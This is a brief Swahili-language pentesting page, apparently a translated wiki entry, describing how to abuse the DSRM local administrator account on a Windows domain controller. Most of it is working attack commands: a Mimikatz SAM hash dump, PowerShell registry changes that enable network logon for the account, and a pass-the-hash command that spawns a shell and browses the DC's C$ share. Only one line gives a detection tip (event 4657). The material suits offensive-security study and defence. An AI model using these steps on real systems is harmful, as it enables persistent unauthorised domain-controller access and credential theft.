Vitambulisho vya DSRM

Kuna akaunti ya msimamizi wa ndani ndani ya kila DC. Ukiwa na mamlaka ya msimamizi kwenye kompyuta hii, unaweza kutumia mimikatz kudondosha hash ya msimamizi wa ndani. Kisha, kwa kubadilisha usajili kuwezesha nenosiri hili ili uweze kufikia kijumbe cha msimamizi wa ndani kwa njia ya kijijini. Kwanza tunahitaji kudondosha hash ya mtumiaji wa msimamizi wa ndani ndani ya DC:

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

Kisha tunahitaji kuhakiki ikiwa akaunti hiyo itafanya kazi, na ikiwa funguo ya usajili ina thamani ya "0" au haipo, unahitaji kuweka thamani kuwa "2":

Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2  #Change value to "2"

Kisha, kwa kutumia PTH unaweza kuorodhesha maudhui ya C$ au hata kupata kikao. Tafadhali kumbuka kuwa kwa kuunda kikao kipya cha powershell na hash hiyo kwenye kumbukumbu (kwa PTH) "kikoa" kinachotumiwa ni jina la kifaa cha DC:

sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
#And in new spawned powershell you now can access via NTLM the content of C$
ls \\dc-host-name\C$

Maelezo zaidi kuhusu hii katika: https://adsecurity.org/?p=1714 na https://adsecurity.org/?p=1785

Kupunguza Hatari

• Tukio ID 4657 - Ukaguzi wa uundaji/mabadiliko ya HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior